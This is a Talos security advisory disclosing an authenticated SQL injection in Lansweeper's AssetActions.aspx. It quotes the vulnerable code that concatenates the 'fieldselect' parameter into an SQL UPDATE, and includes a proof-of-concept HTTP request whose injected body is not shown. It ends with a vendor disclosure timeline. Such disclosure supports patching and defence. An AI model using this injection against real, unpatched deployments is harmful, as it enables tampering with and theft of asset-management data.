Talos Vulnerability Report


Lansweeper lansweeper AssetActions.aspx SQL injection vulnerability

February 28, 2022
CVE Number



An SQL injection vulnerability exists in the AssetActions.aspx functionality of Lansweeper lansweeper A specially crafted HTTP request can cause SQL injection. An attacker can make an authenticated HTTP request to trigger this vulnerability.

Tested Versions

Lansweeper lansweeper

Product URLs

lansweeper - https://www.lansweeper.com/

CVSSv3 Score

6.6 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:L


CWE-89 - Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’)


Lansweeper is an IT Asset Management solution that gathers hardware and software information of computers and other devices on a computer network for management and compliance and audit purposes.

An exploitable SQL Injection vulnerability is related to an fieldSelect parameter passed to : /AssetActions.aspx script. Let us take a close look at the vulnerable source code :


Line 743	else if (page.IsPostBack && current.Request["action"] == "assetfieldschange")
Line 744	{
Line 745		User.Current().CheckRoleRedirect(Permission.EditData);
Line 746		General.ValidateCsrf();
Line 747		JsReturnObject jsReturnObject8 = new JsReturnObject();
Line 748		try
Line 749		{
Line 750			string[] array9 = current.Request["fieldselect"].Split(',');
Line 828					foreach (string text38 in array9)
Line 828				     {    
Line 919           				default:
Line 920                              DB.ExecuteDataset("UPDATE tblAssetCustom SET " + text38 + " = @data, Lastchanged = GETDATE() WHERE AssetID=@aid", DB.NewDBParameter("@data", text41), DB.NewDBParameter("@aid", item10.Key));    

fieldSelect parameter is provided by the user and is not sanitized at all. In line 920 we can notice that fieldSelect is concatenated with the SQL query string in a regular way which leads to SQL injection. To trigger this vulnerability an attacker must be authenticated and have proper permissions.

Exploit Proof of Concept

PoC presents abuse of descibed SQL Injection to set @@version varabile value to Comments field of all assets


POST /AssetActions.aspx?action=assetfieldschange HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 357
Connection: close
Cookie: UserSettings=language=1; custauth=username=hacker&userdomain=; ASP.NET_SessionId=urnwlqmv1l5lmopoadrtppoe; __RequestVerificationToken_Lw__=murmHbbVXPpH1R3EJDgF1WQsZis+Gb6CAsLBYb/j9OSuLM7CD40h4xXqxvCgfuqmOaBtpmsC0k3x3MkQjRQ3HxsbCX8IuNomvCcIQQGKG+90p/DAA6+KM/DvgT9TnlopUM7bszIzCpwDZIsFkAQ7pGzCBKJjAHA4rfFqh3KhEaY=



HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
x-frame-options: SAMEORIGIN
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Fri, 07 Jan 2022 10:01:30 GMT
Connection: close
Content-Length: 189



2022-01-11 - Vendor disclosure
2022-02-21 - Vendor patched
2022-02-28 - Public Release


Discovered by Marcin "Icewall" Noga of Cisco Talos.